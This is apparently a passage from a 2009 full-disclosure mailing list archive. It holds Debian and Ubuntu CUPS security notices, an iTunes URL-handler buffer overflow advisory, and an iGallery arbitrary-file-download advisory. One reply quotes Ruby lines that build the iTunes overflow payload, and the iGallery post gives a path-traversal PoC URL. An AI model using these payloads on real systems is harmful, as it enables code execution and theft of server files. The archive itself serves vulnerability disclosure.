http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 119314 7a4acbab9f1600e266780b8e4edc8161 http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 156808 a67d3ee08ed7bbcee2d90e45b4c5d9fc http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_armel.deb Size/MD5 checksum: 54730 26bc079114200f249ee55182577d978b hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 102958 61cca5c9fe91de9823fe3b141df6cbfd http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 2118150 9a34c8fcfda89744ff1ed5cb57fdeae1 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 63136 dcc115ea567651075e3b7fbf73477f2c http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 406484 36b77c3f6c05df1f44b9a971b2fd3bc8 http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 121714 30743045e4927713923ab1f3bb9e6360 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 1141670 a1d27d8aec34d3e1cefd8af9d680fdce http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 172628 bc5c1f4a039c3fb8dbfdd0dc36aa2f56 http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_hppa.deb Size/MD5 checksum: 39974 b00448f41ec531188e029bc7173f5271 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 99256 289e9977f36773c117b6fcc6580b464f http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 1096046 28adf6b61f8bff81e19ee5b7fc464aac http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 60422 d4646115f417b7d56b1665283e914b42 http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 115956 4db026d788ab7bcb923847491f46b8ca http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 2051272 6b1ce4707c65c46af6ae766ce9b50e99 http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 165348 ffd04ab3b875fef36b26fe3dd1106996 http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 393998 080d022507d07a4713b3f95acb7c22f6 http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_i386.deb Size/MD5 checksum: 38022 7990b6a4a8d217fe07e7e1bd0f9108ff ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 2281420 2adc4c08d3bc24c8d70acac31ca8421a http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 123434 e3c1cbbd801a0ddd985e3b27c021b9d8 http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 209034 5bfbe9000e4f1cafdbc66a6a94c20e7b http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 1149350 7f6b259e7f4ecc70accf51236efb3a5a http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 41278 1cee7bf398c2e2c7e4189f005cbb3444 http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 139124 8ff9597b3e2cd534614a66531a5db361 http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 447412 b59175ffef15d9b2e618b85ce6f8cff2 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_ia64.deb Size/MD5 checksum: 86018 e5badf6982128286853fc360fc77a4d3 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 157842 c3652835b110a94fc5a5f9d20230e443 http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 2047282 ce608c3fa6d89e7d7ff3e313f88fbef2 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 98662 ddbba9bea120f9b7740adc8ceb45c3dc http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 108508 0a5b6ba27061cfa40e45cfc514d3ba0d http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 36010 a786245e49b8cabcaad41a5e92a5c884 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 65290 155e5959fac035fc8307800061913d35 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 1170866 11910e0f1ccbb2f3ba151cbfe8186696 http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_mips.deb Size/MD5 checksum: 405510 4f848ff0dd8f2b08f3fa3bb220a6f75c mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 158274 8c3b143ee488c17cf00cf7599bee331c http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 98792 74a91f31a602f6f2a0c04b4e72723b86 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 1156060 f3be7e74bd904dfdecc086bc6ee16bf5 http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 403142 42cf44870e91355bb7a465dce52605ae http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 36142 daa9ed0b87002a002bece0890b1a6e12 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 65216 a1c8b686980e932f19a789430a4eafaa http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 2028136 a67cf50db9734a8175936ff5e2d45d5d http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_mipsel.deb Size/MD5 checksum: 109968 23ff5d8a36aecd545c5cf210bc3873d5 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 394114 5309447c955f4decbe93f50802ed1805 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 1188662 f8438353bab0a00502a1687042c54961 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 61144 ac80e1cd5cc0661c10693d360e32c11d http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 174232 5938321743bda64571c6d0797f84dca1 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 104730 d5f60c53825c532dca34cb21f1c1d2fb http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 44212 d0b547b8cf87254ce65874df057468db http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 136102 34f3fbb1bf5519277c20944b3d118a6c http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_powerpc.deb Size/MD5 checksum: 2122006 f0e6902972831c2490b6f6bcbecd1ba0 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 101502 e48e528e2b3ee8140dcce180aae0feb8 http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 37818 7f26d32ff01aa1088e424a16439d0990 http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 171544 131841fd12d9331c312f8a28718fe8a1 http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 399662 f80688352e705e1293d64bb211dcd568 http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 2090700 7d406321bb349547bdbe43123fb770f3 http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 118588 64d6969a96a76de52a7296c745116a48 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 1188192 365ee760b0b9b8dd869dd11f1f4c42f9 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_s390.deb Size/MD5 checksum: 60716 634f2ba3cc0eb22c59252f15a1582770 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/c/cups/libcups2-dev_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 390982 1235ace473b594360267daef5663c1b3 http://security.debian.org/pool/updates/main/c/cups/cups-client_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 116666 3c08364f33b2594c4f8be8c0bfce7333 http://security.debian.org/pool/updates/main/c/cups/cups-dbg_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 1051168 056faed5a5baf927d91b21b4fe624812 http://security.debian.org/pool/updates/main/c/cups/cups-bsd_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 38374 6401223175cfcf9082f3fac43a4f9d42 http://security.debian.org/pool/updates/main/c/cups/cups_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 2069062 4041871842ca0f29408c95c39f9cbb68 http://security.debian.org/pool/updates/main/c/cups/libcups2_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 160772 6a682010c72d5d78f4a6efcfb3ed5955 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2-dev_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 57762 478e92cd02d8acb20a600d4ca61aba39 http://security.debian.org/pool/updates/main/c/cups/libcupsimage2_1.3.8-1+lenny6_sparc.deb Size/MD5 checksum: 96996 37446d6e2f9dbf94122db96d1df00b9f These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkolko8ACgkQHYflSXNkfP+rjwCfWDGEVO8HeUkO9sF09pz0Nvwn 4GMAn3rgCfJK2rFC5dZyvIzTiyo6CiUb =6yYH -----END PGP SIGNATURE----- From redpig at dataspill.org Tue Jun 2 23:20:46 2009 From: redpig at dataspill.org (Will Drewry) Date: Tue, 2 Jun 2009 17:20:46 -0500 Subject: [Full-disclosure] TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities In-Reply-To: <C64AF549.17CE6%dvlabs@tippingpoint.com> References: <C64AF549.17CE6%dvlabs@tippingpoint.com> Message-ID: <2359eed20906021520l6064a9a7j4c5ef1545cdb2c46@mail.gmail.com> Here's the (mac) exploit module to go along with my simul-report to apple: http://static.dataspill.org/releases/itunes/itms_overflow.rb On Tue, Jun 2, 2009 at 3:27 PM, dvlabs <dvlabs at tippingpoint.com> wrote: > TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow > Vulnerabilities > http://dvlabs.tippingpoint.com/advisory/TPTI-09-03 > June 2, 2009 > > -- CVE ID: > CVE-2009-0950 > > -- Affected Vendors: > Apple > > -- Affected Products: > Apple iTunes > > -- TippingPoint(TM) IPS Customer Protection: > TippingPoint IPS customers have been protected against this > vulnerability by Digital Vaccine protection filter ID 8013. > For further product information on the TippingPoint IPS, visit: > > ? ?http://www.tippingpoint.com > > -- Vulnerability Details: > This vulnerability allows remote attackers to execute arbitrary code on > vulnerable installations of Apple iTunes. User interaction is required > to exploit this vulnerability in that the target must visit a malicious > page. > > The specific flaw exists in the URL handlers associated with iTunes. > When processing URLs via the protocol handlers "itms", "itmss", "daap", > "pcast", and "itpc" an exploitable stack overflow occurs. Successful > exploitation can lead to a remote system compromise under the > credentials of the currently logged in user. > > -- Vendor Response: > Apple has issued an update to correct this vulnerability. More > details can be found at: > > http://support.apple.com/kb/HT3592 > > -- Disclosure Timeline: > 2009-04-09 - Vulnerability reported to vendor > 2009-06-02 - Coordinated public release of advisory > > -- Credit: > This vulnerability was discovered by: > ? ?* James King, TippingPoint DVLabs > > From Thierry at Zoller.lu Wed Jun 3 11:45:25 2009 From: Thierry at Zoller.lu (Thierry Zoller) Date: Wed, 3 Jun 2009 12:45:25 +0200 Subject: [Full-disclosure] TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities In-Reply-To: <2359eed20906021520l6064a9a7j4c5ef1545cdb2c46@mail.gmail.com> References: <C64AF549.17CE6%dvlabs@tippingpoint.com> <2359eed20906021520l6064a9a7j4c5ef1545cdb2c46@mail.gmail.com> Message-ID: <1143683420.20090603124525@Zoller.lu> Hi Will, WD> Here's the (mac) exploit module to go along with my simul-report to WD> apple: http://static.dataspill.org/releases/itunes/itms_overflow.rb OMFG, you must by kidding, are we 1999 again ?? Classical Stack buffer overflow in URL request ?! ..o m f g =) Nice find! itms_base_url = "itms://:" itms_base_url << "A"*268 # Fill up the real buffer itms_base_url << "XXXXAAAAZZZZYYYY" # $ebx, $esi, $edi, $ebp itms_base_url << target['Addr'] # hullo there, jmp *%ecx! -- http://blog.zoller.lu Thierry Zoller From stefano.angaran at upyou.it Wed Jun 3 13:21:02 2009 From: stefano.angaran at upyou.it (Stefano Angaran) Date: Wed, 03 Jun 2009 14:21:02 +0200 Subject: [Full-disclosure] Blue-Collar Productions iGallery 4.1 Plus Arbitrary File Download Message-ID: <4A266AAE.1080208@upyou.it> Vendor Notified: 05/25/2009 Vulnerability Details: ------------------------------------------- Blue Collar Productions iGallery 4.1 Plus ( http://www.b-cp.com/igallery/default.asp ) is a commercial photo gallery script written in Classic ASP. There exists also a free version named iGallery 3.4. The file streamfile.asp suffers from an Arbitrary File Download vulnerability due to the missed input validation on the "i" and "f" parameters, in particular no validation is done on path traversal patterns. Systems Affected: ------------------------------------------- iGallery 4.1 Plus and iGallery 3.4 were tested and shown to be vulnerable. Impact: ------------------------------------------- Through this vulnerability remote and unauthenticated users could download any file accessible by the web server and by reading source files a malicious user could read important information such as database passwords. Mitigation Factors: ------------------------------------------- New IIS installations are often configured to deny requests with ../ in the query string. Unfortunately the injection can come also from POST parameters. PoC: ------------------------------------------- http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir Vendor Response: ------------------------------------------- None as of 06/03/2009 --- Stefano Angaran http://www.upyou.it http://blog.upyou.it From nick at virus-l.demon.co.uk Wed Jun 3 13:47:35 2009 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Thu, 04 Jun 2009 00:47:35 +1200 Subject: [Full-disclosure] TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities In-Reply-To: <1143683420.20090603124525@Zoller.lu> References: <C64AF549.17CE6%dvlabs@tippingpoint.com> <2359eed20906021520l6064a9a7j4c5ef1545cdb2c46@mail.gmail.com> <1143683420.20090603124525@Zoller.lu> Message-ID: <4A2670E7.2919.7AF5C48C@nick.virus-l.demon.co.uk> Thierry Zoller to Will Drewry: > WD> Here's the (mac) exploit module to go along with my simul-report to > WD> apple: http://static.dataspill.org/releases/itunes/itms_overflow.rb > > OMFG, you must by kidding, are we 1999 again ?? Classical Stack buffer > overflow in URL request ?! ..o m f g =) Nice find! You must be wrong! It's a well-known fact -- just ask any Apple fanboi -- that Macs are invulnerable to security exploits of any kind because they are based on Unix-ish and/or open source code and/or are developed by far cooler _and_ cleverer dudes than anyone who ever worked at MS (or anywhere else for that matter, except NeXT) and/or because Steve (the sun shines out my orifices) Jobs said so... So, now we've established that you are wrong, HTF can anyone at Apple seriously claim their shit is worth bottling given they keep getting caught with such egregiously crappy bugs in their code? And how is it that folk who really should know better keep feeding this line of BS? Oh, that's right, they need to justify the grossly excessive cost of those non-Windows x86 machines they've been buying the last few years... Regards, Nick FitzGerald From sheipani at gmail.com Wed Jun 3 14:05:43 2009 From: sheipani at gmail.com (Ahmed Sheipani) Date: Wed, 3 Jun 2009 15:05:43 +0200 Subject: [Full-disclosure] Hardening TCP/IP Stack Message-ID: <361c9c560906030605q3d452467mbd2223ed80766020@mail.gmail.com> *Hardening TCP/IP Stack* *By Ahmed S. Shibani* * * *Overview* * * During my work as a server administrator for a web hosting company, I have noticed how often it is to get under random SYN flood attacks, and using the latest firewalls did not prove to be the ultimate solution, you still get affected by the attacks, I believe that the best way to mitigate those attacks is by securing the TCP/IP stack itself, here I will collect the most useful information I have found on doing this. All instructions in this article will be for Linux, I will indicate so if different. Continue Reading...<http://sec.ure.ly/?s=blog&m=permalink&x=hardening-tcpip-stack> http://sec.ure.ly -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090603/83e79958/attachment.html From marc.deslauriers at canonical.com Wed Jun 3 15:19:41 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Wed, 03 Jun 2009 10:19:41 -0400 Subject: [Full-disclosure] [USN-780-1] CUPS vulnerability Message-ID: <1244038781.12402.0.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-780-1 June 03, 2009 cups, cupsys vulnerability CVE-2009-0949 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: cupsys 1.2.2-0ubuntu0.6.06.14 Ubuntu 8.04 LTS: cupsys 1.3.7-1ubuntu3.5 Ubuntu 8.10: cups 1.3.9-2ubuntu9.2 Ubuntu 9.04: cups 1.3.9-17ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Anibal Sacco discovered that CUPS did not properly handle certain network operations. A remote attacker could exploit this flaw and cause the CUPS server to crash, resulting in a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.14.diff.gz Size/MD5: 101447 1edf4eb6127965001092ac72fc5743ea http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.14.dsc Size/MD5: 1060 4843503dffb5c5268a64499cb2cf279e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2.orig.tar.gz Size/MD5: 4070384 2c99b8aa4c8dc25c8a84f9c06aa52e3e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.2.2-0ubuntu0.6.06.14_all.deb Size/MD5: 998 ee02e19aab490d9d97b6d3eb0f0808e4 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.14_amd64.deb Size/MD5: 36236 8f3c604623813d67800c2f06686ccd1b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.14_amd64.deb Size/MD5: 81894 166216227002808778e9a01798409a37 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.14_amd64.deb Size/MD5: 2287028 141ace9ca050db86cdef9b44e620c13b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.14_amd64.deb Size/MD5: 6094 f338b2ae622333497e2cda10f26590e9 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.14_amd64.deb Size/MD5: 77648 40846208a23006cab7c7bd52813a6343 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.14_amd64.deb Size/MD5: 25756 5b703a78f78465181f785715ef7036cc http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.14_amd64.deb Size/MD5: 130344 6c9d54d7f6c8069d8d69652bf6dbddd7 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.14_i386.deb Size/MD5: 34762 08037502d74a512a07b184c2999d32ad http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.14_i386.deb Size/MD5: 77992 260347aa2b7f4ec59fcaa1d29a16e0c3 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.14_i386.deb Size/MD5: 2254260 49e00eabc519426ee5413864c4bdb251 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.14_i386.deb Size/MD5: 6092 0a515dd0fdd48eb70da0b5bfe3019f08 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.14_i386.deb Size/MD5: 76752 7ee453f379433e22b9451e6282669797 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.14_i386.deb Size/MD5: 25740 28af462a2e8f13620bb1b70cef1cd08e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.14_i386.deb Size/MD5: 122538 200a588a83e668f621ca41bc41a13413 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.14_powerpc.deb Size/MD5: 40462 3937e3b6cb8f6cda2f1e450518a4e136 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.14_powerpc.deb Size/MD5: 89516 bf845949727422d0ae4d550966d34c72 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.14_powerpc.deb Size/MD5: 2301634 8bf6a7e2fcff62817459186c189673d1 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.14_powerpc.deb Size/MD5: 6094 cb2ff11f6c55d69b99f39e64ad399774 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.14_powerpc.deb Size/MD5: 79292 b137122dde7459d5653e024b4d3b5852 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.14_powerpc.deb Size/MD5: 25744 7765abc3cea993a82a638458202892e5 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.14_powerpc.deb Size/MD5: 128304 69634210a2fa2a8af2383a12b657a568 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.14_sparc.deb Size/MD5: 35390 f4a5a9207d6494c05a7820cdbf2cadf9 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.14_sparc.deb Size/MD5: 78720 423336f4bf4be9292f49f31ab6cac3dc http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.14_sparc.deb Size/MD5: 2287900 4833fae9ab11ecd3721faef405ad8167 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.14_sparc.deb Size/MD5: 6094 ebae0d6eb86d9e3f4fff77c860f1693c http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.14_sparc.deb Size/MD5: 76568 7d1814766e366021fc136cb6577880b9 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.14_sparc.deb Size/MD5: 25746 a4eacdcf7d078a8200660cf0bb37c694 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.14_sparc.deb Size/MD5: 124034 6fd4c6c86596379e32fc228ed15cf4dc Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.5.diff.gz Size/MD5: 135129 091bf3e7ac7e1a1f074dc15d08c2c4d5 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.5.dsc Size/MD5: 1441 9cf7f2d9b00a22af8e8ccdfbe234fd8e http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7.orig.tar.gz Size/MD5: 4700333 383e556d9841475847da6076c88da467 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.3.7-1ubuntu3.5_all.deb Size/MD5: 1144240 9c3908b1639d493bcc580368adbfa3a3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.5_amd64.deb Size/MD5: 37530 c252102dbd39005b010fff629e4daf2c http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.5_amd64.deb Size/MD5: 89980 2d95b8b2a44cfa62603335d6211f5fd1 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.5_amd64.deb Size/MD5: 1880552 e94141a55ae34eb9ac5be1b941268f5b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.5_amd64.deb Size/MD5: 60804 9e8d5476cccb6ea9ac0d0eaf1db9c615 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.5_amd64.deb Size/MD5: 50216 5de274a35fa3cbea87c9245b179364b5 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.5_amd64.deb Size/MD5: 344920 6a966e90749cbaf815c511717b84abaa http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.5_amd64.deb Size/MD5: 178092 3d4bda40ecf7c2091cc173b79658d6c9 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.5_i386.deb Size/MD5: 36952 2c6053368cf2a00f66197eca444af3b5 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.3.7-1ubuntu3.5_i386.deb Size/MD5: 88394 0c572acada7273e30b15bcb3cc2874cb http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.3.7-1ubuntu3.5_i386.deb Size/MD5: 1863054 68e5cbd5fd1ed11bee4fef0c4e79de7f http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.3.7-1ubuntu3.5_i386.deb Size/MD5: 60082 062ad31917eedc6e5003e990807d838b http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.3.7-1ubuntu3.5_i386.deb Size/MD5: 49852 9ac15961d63d2fd6f4ce702e688a8985 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.3.7-1ubuntu3.5_i386.deb Size/MD5: 339354 8b842a2c754dc36a307aa64e613fe4c7 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.3.7-1ubuntu3.5_i386.deb Size/MD5: 174938 58ab39cc15878a158487fb858af9958d lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/c/cupsys/cupsys-bsd_1.3.7-1ubuntu3.5_lpia.deb Size/MD5: 36658 